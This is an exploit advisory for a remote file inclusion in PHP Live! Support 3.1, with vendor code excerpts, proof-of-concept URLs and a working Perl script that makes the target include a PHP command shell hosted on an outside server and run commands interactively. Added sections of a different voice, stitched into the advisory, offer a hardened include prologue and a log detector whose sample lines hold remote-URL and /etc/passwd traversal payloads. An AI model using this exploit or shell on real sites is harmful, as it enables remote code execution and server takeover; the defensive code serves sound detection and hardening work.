OSI Codes PHP Live! Support 3.1 Remote File Inclusion
Posted Nov 23, 2009
Authored by Don Tukulesto | Site indonesiancoder.com

OSI Codes PHP Live! Support version 3.1 suffers from a remote file inclusion vulnerability.

tags | exploit, remote, php, code execution, file inclusion
SHA-256 | 166ca7335c4d46caad48f60ac32d51993582dc6e1440aa04daa5e308c83b1ad7

#####
# [»] Author : Don Tukulesto (root@indonesiancoder.com)
# [»] Date : November 23, 2009
# [»] Homepage : http://www.indonesiancoder.com
# [»] Method : Remote File Inclusion
# [»] Location : INDONESIA
# [»] Vendor : http://www.phplivesupport.com/
# [»] Describe : PHP Live! Support v3.1 (c) by OSI Codes Inc.
# Chat with your website visitors with PHP Live!
#
# * Provide Live Support on your Website
# * Increase your Sales
# * Increase Customer Satisfaction
# * Decrease your phone/operational costs
# [»] Usage :
# perl tux.pl <target> <weapon url> cmd
# perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system($_GET['cmd']); ?>
#####
# [-] Bugs in

[+] index.php
<pre lang="php">
<?php
/*******************************************************
* COPYRIGHT OSI CODES - PHP Live!
*******************************************************/
session_start() ;
$l = "" ;
// try to get cookie value first
if ( isset( $_COOKIE['COOKIE_PHPLIVE_SITE'] ) ) { $l = $_COOKIE['COOKIE_PHPLIVE_SITE'] ; }
if ( isset( $_GET['l'] ) ) { $l = $_GET['l'] ; }
if ( isset( $_POST['l'] ) ) { $l = $_POST['l'] ; }

if ( !file_exists( "./web/conf-init.php" ) )
{
HEADER( "location: setup/index.php" ) ;
exit ;
}

include_once( "./API/Util_Dir.php" ) ;
if ( Util_DIR_CheckDir( ".", $l ) )
include_once("./web/$l/$l-conf-init.php") ;
include_once("./web/conf-init.php") ;
$DOCUMENT_ROOT = realpath( preg_replace( "/http:/", "", $DOCUMENT_ROOT ) ) ;
include_once("$DOCUMENT_ROOT/API/Util_Error.php") ;
include_once("$DOCUMENT_ROOT/system.php") ;
include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ;
include_once("$DOCUMENT_ROOT/web/VERSION_KEEP.php") ;
include_once("$DOCUMENT_ROOT/API/Util_CleanFiles.php") ;
include_once("$DOCUMENT_ROOT/API/sql.php" ) ;
include_once("$DOCUMENT_ROOT/API/Users/get.php") ;
include_once("$DOCUMENT_ROOT/API/Users/update.php") ;
include_once("$DOCUMENT_ROOT/API/Chat/remove.php") ;
include_once("$DOCUMENT_ROOT/API/ASP/get.php") ;

// initialize
$action = $error = $sid = $site = $remember = "" ;
$sound_file = "cellular.wav" ;
$isadmin = $winapp = $autologin = $wflag = $closewin = 0 ;

if ( !isset( $_SESSION['session_admin'] ) )
{
session_register( "session_admin" ) ;
$session_admin = ARRAY() ;
$_SESSION['session_admin'] = ARRAY() ;
}

// check to see if the site login is passes. if not, then let's see how many
// sites are in the asp model. if only ONE, then default to that one.
$total_sites = AdminASP_get_TotalUsers( $dbh ) ;
if ( $total_sites == 1 )
{
$site = AdminASP_get_AllUsers( $dbh, 0, 1 ) ;
$l = $site[0]['login'] ;
}

if ( isset( $LOGO ) && file_exists( "$DOCUMENT_ROOT/web/$l/$LOGO" ) && $LOGO )
$logo = "$BASE_URL/web/$l/$LOGO" ;
else if ( file_exists( "$DOCUMENT_ROOT/web/$LOGO_ASP" ) && $LOGO_ASP )
$logo = "$BASE_URL/web/$LOGO_ASP" ;
else
$logo = "$BASE_URL/images/logo.gif" ;

// get variables
if ( isset( $_POST['action'] ) ) { $action = $_POST['action'] ; }
if ( isset( $_GET['action'] ) ) { $action = $_GET['action'] ; }
if ( isset( $_POST['winapp'] ) ) { $winapp = $_POST['winapp'] ; }
if ( isset( $_GET['winapp'] ) ) { $winapp = $_GET['winapp'] ; }
if ( isset( $_GET['wflag'] ) ) { $wflag = $_GET['wflag'] ; }
if ( isset( $_GET['closewin'] ) && ( $_GET['closewin'] != "undefined" ) ) { $closewin = $_GET['closewin'] ; }

// conditions
if ( ( isset( $_COOKIE['COOKIE_PHPLIVE_LOGIN'] ) && isset( $_COOKIE['COOKIE_PHPLIVE_PASSWORD'] ) && isset( $_COOKIE['COOKIE_PHPLIVE_SITE'] ) ) && !$action )
$autologin = 1 ;

if ( $action == "login" )
{
if ( $l )
$site = $l ;
else
$site = $_POST['site'] ;

$aspinfo = AdminASP_get_ASPInfoByASPLogin( $dbh, $site ) ;
$admin = AdminUsers_get_UserInfoByLoginPass( $dbh, $_POST['login'], $_POST['password'], $aspinfo['aspID'] ) ;

if ( !$aspinfo['active_status'] )
$error = "Serviço está inativo. Entre em contato com o administrador para obter detalhes setup." ;
else
{
if ( $admin['userID'] && ( $admin['aspID'] == $aspinfo['aspID'] ) )
{
CleanFiles_util_CleanChatSessionFiles() ;

// set $sid. $sid is used to keep track of this admin user. $sid allows
// so a user can log into several admin departments on same computer. it is
// passed everywhere the admin goes.
$sid = time() ;

$departments = AdminUsers_get_UserDepartments( $dbh, $admin['userID'] ) ;
$dept_string = "" ;
for ( $c = 0; $c < count( $departments ); ++$c )
{
$the_department = $departments[$c] ;
$dept_string .= "deptID = $the_department[deptID] OR " ;
}
$dept_string .= "deptID = 0" ;

$_SESSION['session_admin'][$sid] = ARRAY() ;
$_SESSION['session_admin'][$sid]['dept_string'] = $dept_string ;
$_SESSION['session_admin'][$sid]['admin_id'] = $admin['userID'] ;
$_SESSION['session_admin'][$sid]['requests'] = 0 ;
$_SESSION['session_admin'][$sid]['aspID'] = $aspinfo['aspID'] ;
$_SESSION['session_admin'][$sid]['asp_login'] = $aspinfo['login'] ;
$_SESSION['session_admin'][$sid]['active_footprints'] = 0 ;
$_SESSION['session_admin'][$sid]['winapp'] = "$winapp" ;
$_SESSION['session_admin'][$sid]['close_timer'] = 0 ;
$_SESSION['session_admin'][$sid]['traffic_monitor'] = 0 ;
$_SESSION['session_admin'][$sid]['available_status'] = 1 ;
$_SESSION['session_admin'][$sid]['sound'] = "on" ;
$_SESSION['session_admin'][$sid]['request_ids'] = "" ;
$_SESSION['session_admin'][$sid]['traffic_timer'] = $admin['console_refresh'] ;
$isadmin = 1 ;

// check to see if they want to be remembered... if so, just set cookie.
// let's set it for 1 month for now.
$cookie_lifespan = time() + 60*60*24*30 ;
if ( isset( $_POST['remember'] ) )
{
setcookie( "COOKIE_PHPLIVE_LOGIN", $_POST['login'], $cookie_lifespan ) ;
setcookie( "COOKIE_PHPLIVE_PASSWORD", $_POST['password'], $cookie_lifespan ) ;
setcookie( "COOKIE_PHPLIVE_SITE", $aspinfo['login'], $cookie_lifespan ) ;
}
}
else
{
// reset cookie if cookies are set
if ( isset( $_COOKIE['COOKIE_PHPLIVE_LOGIN'] ) && isset( $_COOKIE['COOKIE_PHPLIVE_PASSWORD'] ) )
{
setcookie( "COOKIE_PHPLIVE_LOGIN", "", -1 ) ;
setcookie( "COOKIE_PHPLIVE_PASSWORD", "", -1 ) ;
setcookie( "COOKIE_PHPLIVE_SITE", "", -1 ) ;
}
$error = "Falha de Login. Nota: sua senha é (CaSE senSiTiVE)." ;
}
}
}
else if ( $action == "logout" )
{
if ( isset( $_COOKIE['COOKIE_PHPLIVE_LOGIN'] ) && isset( $_COOKIE['COOKIE_PHPLIVE_PASSWORD'] ) && !$wflag )
{
setcookie( "COOKIE_PHPLIVE_LOGIN", "", -1 ) ;
setcookie( "COOKIE_PHPLIVE_PASSWORD", "", -1 ) ;
setcookie( "COOKIE_PHPLIVE_SITE", "", -1 ) ;
}
$sid = $_GET['sid'] ;
$l = $_SESSION['session_admin'][$sid]['asp_login'] ;
AdminUsers_update_Status( $dbh, $_SESSION['session_admin'][$sid]['admin_id'], 0 ) ;
AdminUsers_update_UserValue( $dbh, $_SESSION['session_admin'][$sid]['admin_id'], "last_active_time", $admin_idle - 300 ) ;
$_SESSION['session_admin'] = Array() ;
HEADER( "location: index.php?wflag=$wflag&l=$l&winapp=$winapp&closewin=$closewin" ) ;
exit ;
}
else
{
// do the cleaning of the chat database of old requests and sessions.
ServiceChat_remove_CleanChatSessionList( $dbh ) ;
ServiceChat_remove_CleanChatSessions( $dbh ) ;
ServiceChat_remove_CleanChatRequests( $dbh ) ;
}
?>
</pre>

[+] chat.php
<pre lang="php">
<?php
/*******************************************************
* COPYRIGHT OSI CODES - PHP Live!
*******************************************************/
session_start() ;
$session_chat = $_SESSION['session_chat'] ;
$sid = ( isset( $_GET['sid'] ) ) ? $_GET['sid'] : "" ;
$requestid = ( isset( $_GET['requestid'] ) ) ? $_GET['requestid'] : "" ;
$sessionid = ( isset( $_GET['sessionid'] ) ) ? $_GET['sessionid'] : "" ;
$userid = ( isset( $_GET['userid'] ) ) ? $_GET['userid'] : "" ;
$action = ( isset( $_GET['action'] ) ) ? $_GET['action'] : "" ;
if ( !file_exists( "web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php" ) || !file_exists( "web/conf-init.php" ) )
{
print "<font color=\"#FF0000\">[Configuration Error: config files not found! -$sid] Exiting...</font>" ;
exit ;
}
include_once("./web/conf-init.php") ;
$DOCUMENT_ROOT = realpath( preg_replace( "/http:/", "", $DOCUMENT_ROOT ) ) ;
include_once("$DOCUMENT_ROOT/web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php") ;
include_once("$DOCUMENT_ROOT/system.php") ;
include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ;
include_once("$DOCUMENT_ROOT/API/sql.php") ;
include_once("$DOCUMENT_ROOT/API/Chat/update.php") ;


// set frame row properties depending if admin or regular request
$frame_row_properties = "*,100%" ;
if ( $session_chat[$sid]['isadmin'] && $session_chat[$sid]['deptid'] )
$frame_row_properties = "*,100%" ;
// let's start the poll time
$_SESSION['session_chat'][$sid]['admin_poll_time'] = time() ;
$window_title = preg_replace( "/<(.*)>/", "", $session_chat[$sid]['visitor_name'] ) .": Support Request" ;
?>
</pre>

[+] help.php
<pre lang="php">
<?php
/*******************************************************
* COPYRIGHT OSI CODES - PHP Live!
*******************************************************/
include_once("./web/conf-init.php");
$DOCUMENT_ROOT = realpath( preg_replace( "/http:/", "", $DOCUMENT_ROOT ) ) ;
include_once("$DOCUMENT_ROOT/system.php") ;
include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ;
include_once("$DOCUMENT_ROOT/web/VERSION_KEEP.php") ;
include_once("$DOCUMENT_ROOT/API/sql.php") ;

// initialize
$action = "" ;

if ( preg_match( "/(MSIE)|(Gecko)/", $_SERVER['HTTP_USER_AGENT'] ) )
$text_width = "12" ;
else
$text_width = "9" ;

$success = 0 ;
// update all admins status to not available if they have been idle

// get variables
if ( isset( $_POST['action'] ) ) { $action = $_POST['action'] ; }
if ( isset( $_GET['action'] ) ) { $action = $_GET['action'] ; }
?>
</pre>
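All three files rebuild `$DOCUMENT_ROOT` with `realpath( preg_replace( "/http:/", "", $DOCUMENT_ROOT ) )` and then interpolate it, together with the request-supplied `$l`, straight into `include_once()` paths. None of the code shown reads `DOCUMENT_ROOT` from `$_GET`, so a query parameter can only reach that variable through `register_globals`-style injection of request data into globals. The following is an added example of a hardened prologue for these pages; it is not OSI Codes' code. The names `phplive_site_dir()`, `phplive_site_conf()` and `PHPLIVE_ROOT` and the fallback language pack `en` are hypothetical; the `web/<login>/<login>-conf-init.php` layout is taken from the vendor code above.

```php
<?php
// Added example (not OSI Codes' code): a hardened include prologue for the
// PHP Live! pages shown above. phplive_site_dir(), phplive_site_conf() and
// PHPLIVE_ROOT are hypothetical names; the web/<login>/<login>-conf-init.php
// layout is the vendor's, as seen in index.php and chat.php.

// 1. The document root is fixed at deploy time. A constant built from __DIR__
//    cannot be overwritten by register_globals, a cookie or a query string.
define('PHPLIVE_ROOT', realpath(__DIR__));

// 2. Allowlist the site/login token before it touches any path. A short
//    alphanumeric token cannot carry "/", "..", "http:" or a null byte.
function phplive_site_dir(string $root, ?string $l): ?string
{
    if ($l === null || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $l)) {
        return null;
    }
    $webRoot = realpath($root . '/web');
    $dir     = realpath($root . '/web/' . $l);
    // After symlink resolution the directory must still sit inside web/.
    // realpath() returns false when the directory does not exist.
    if ($webRoot === false || $dir === false
        || strpos($dir, $webRoot . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $dir;
}

// 3. Every include path is built from the constant and the validated token only.
function phplive_site_conf(string $root, ?string $l): ?string
{
    $dir = phplive_site_dir($root, $l);
    if ($dir === null) {
        return null;
    }
    $conf = $dir . '/' . $l . '-conf-init.php';
    return is_file($conf) ? $conf : null;
}

// Page prologue. Precedence matches index.php (POST, then GET, then cookie),
// but the value is validated instead of being interpolated into include_once().
$l = $_POST['l'] ?? $_GET['l'] ?? $_COOKIE['COOKIE_PHPLIVE_SITE'] ?? null;
$siteConf = phplive_site_conf(PHPLIVE_ROOT, is_string($l) ? $l : null);
if ($siteConf === null) {
    http_response_code(400);
    exit('Unknown site.');
}

include_once PHPLIVE_ROOT . '/web/conf-init.php';
include_once $siteConf;

// $LANG_PACK comes from conf-init.php. Keep it config-only and allowlist it as
// well, otherwise the lang_packs/ include becomes the next injection point.
// 'en' as the fallback pack is an assumption for this example.
if (!isset($LANG_PACK) || !is_string($LANG_PACK)
    || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $LANG_PACK)) {
    $LANG_PACK = 'en';
}
include_once PHPLIVE_ROOT . '/system.php';
include_once PHPLIVE_ROOT . '/lang_packs/' . $LANG_PACK . '.php';
include_once PHPLIVE_ROOT . '/API/sql.php';
```

The design point is that no request-derived string is ever concatenated into an include path: the root is a constant, the site token is matched against a strict pattern and then re-checked with `realpath()` against the `web/` directory, and the language pack is constrained the same way. Disabling `register_globals` (and `allow_url_include`) in `php.ini` is the complementary server-side control, but the prologue above does not depend on either setting.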


[-] PoC

http://127.0.0.1/path/index.php?DOCUMENT_ROOT=
http://127.0.0.1/path/chat.php?DOCUMENT_ROOT=
http://127.0.0.1/path/help.php?DOCUMENT_ROOT=
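From the detection side, as an added example that is not part of the advisory: the distinguishing feature of these requests in an access log is a full URL (followed by `?&cmd=` in the exploit's case) in the `DOCUMENT_ROOT` query parameter of `index.php`, `chat.php` or `help.php`. The PHP CLI script below checks constructed combined-format log lines for that shape, and for traversal sequences in the `l` parameter that the same include prologue consumes. `phplive_rfi_indicators()`, the sample addresses and the log lines are assumptions constructed for this example.

```php
<?php
// Added example (not part of the advisory): scan web-server access-log lines for
// the request shape the PoC uses, i.e. a URL or a traversal sequence in the
// DOCUMENT_ROOT or l parameter of the PHP Live! pages. Function name, addresses
// and log lines are constructed for the example.

function phplive_rfi_indicators(string $line): array
{
    // Combined log format: ... "GET /path?query HTTP/1.1" ...
    if (!preg_match('/"(?:GET|POST)\s+(\S+)\s+HTTP\//', $line, $m)) {
        return [];
    }
    $target = $m[1];
    $qpos   = strpos($target, '?');
    if ($qpos === false) {
        return [];
    }
    // Split on the first '?' by hand: a second '?' inside the injected URL
    // (the exploit appends "?&cmd=") would confuse parse_url().
    parse_str(substr($target, $qpos + 1), $params);

    $findings = [];
    foreach (['DOCUMENT_ROOT', 'l'] as $p) {
        if (!isset($params[$p]) || !is_string($params[$p])) {
            continue;
        }
        $v = $params[$p];
        // scheme://host or a bare //host (http, ftp, data, php, ...)
        if (preg_match('#\A(?:[a-z][a-z0-9+.-]*:)?//#i', $v)) {
            $findings[] = "$p=remote-url";
        } elseif (strpos($v, '..') !== false || strpos($v, "\0") !== false) {
            $findings[] = "$p=traversal";
        }
    }
    return $findings;
}

// Constructed sample: one benign request, one with the advisory's PoC shape
// (remote URL in DOCUMENT_ROOT), one traversal attempt against the l parameter.
$sampleLog = [
    '10.0.0.5 - - [23/Nov/2009:10:00:00 +0000] "GET /phplive/help.php?action=faq HTTP/1.1" 200 512',
    '10.0.0.9 - - [23/Nov/2009:10:00:03 +0000] "GET /phplive/help.php?DOCUMENT_ROOT=http://203.0.113.7/s.txt?&cmd=id HTTP/1.1" 200 81',
    '10.0.0.9 - - [23/Nov/2009:10:00:09 +0000] "GET /phplive/index.php?l=..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 120',
];

foreach ($sampleLog as $line) {
    $hits = phplive_rfi_indicators($line);
    if ($hits !== []) {
        // Second line reports DOCUMENT_ROOT=remote-url, third reports l=traversal.
        echo 'ALERT ', implode(',', $hits), ' :: ', $line, PHP_EOL;
    }
}
```

Against a real log, replace the `$sampleLog` array with a loop over `STDIN` (`while (($line = fgets(STDIN)) !== false)`) and feed it `access.log`. Values are decoded by `parse_str()`, so percent-encoded `..%2F` and `%00` are caught as well as their literal forms; a `200` status on a hit is the signal that the include actually ran and the host should be treated as compromised rather than merely probed.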

[-] eXpL0!t c0des

<pre lang="perl">
#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;
$RoNz = $ARGV[0];
$Pathloader = $ARGV[1];
$Contrex = $ARGV[2];
if($RoNz!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()}
head();
sub head()
{
print "[o]============================================================================[o]\r\n";
print " | PHP Live! Support v3.1 Multiple Remote File Include |\r\n";
print "[o]============================================================================[o]\r\n";
}
while()
{
print "[w00t] \$";
while(<STDIN>)
{
$kaMtiEz=$_;
chomp($kaMtiEz);
$arianom = LWP::UserAgent->new() or die;
$tiw0L = HTTP::Request->new(GET =>$RoNz.'help.php?DOCUMENT_ROOT='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n";
$abah_benu = $arianom->request($tiw0L);
$tukulesto = $abah_benu->content;
$tukulesto =~ tr/[\n]/[Í]/;
if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";}
elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /)
{print "\nCann't Connect to cmd Host or Invalid Command\n";exit}
elsif ($tukulesto =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
if($tukulesto =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[Í]/[\n]/;
print "\r\n$finreturn\n\r";
last;
}
else {print "[w00t] \$";}}}last;
sub usage()
{
head();
print " | Usage: perl tux.pl <target> <weapon url> <cmd> |\r\n";
print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |\r\n";
print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n";
print " | <cmd> - Command variable used in php shell |\r\n";
print "[o]============================================================================[o]\r\n";
print " | IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org |\r\n";
print " | kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |\r\n";
print " | M364TR0N, TUCKER, Ian Petrucii, kecemplungkalen, NoGe, bh4nd55, MainHack.Net |\r\n";
print " | Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint |\r\n";
print " | Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |\r\n";
print "[o]============================================================================[o]\r\n";
print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm |\r\n";
print "[o]============================================================================[o]\r\n";
exit();
}
</pre>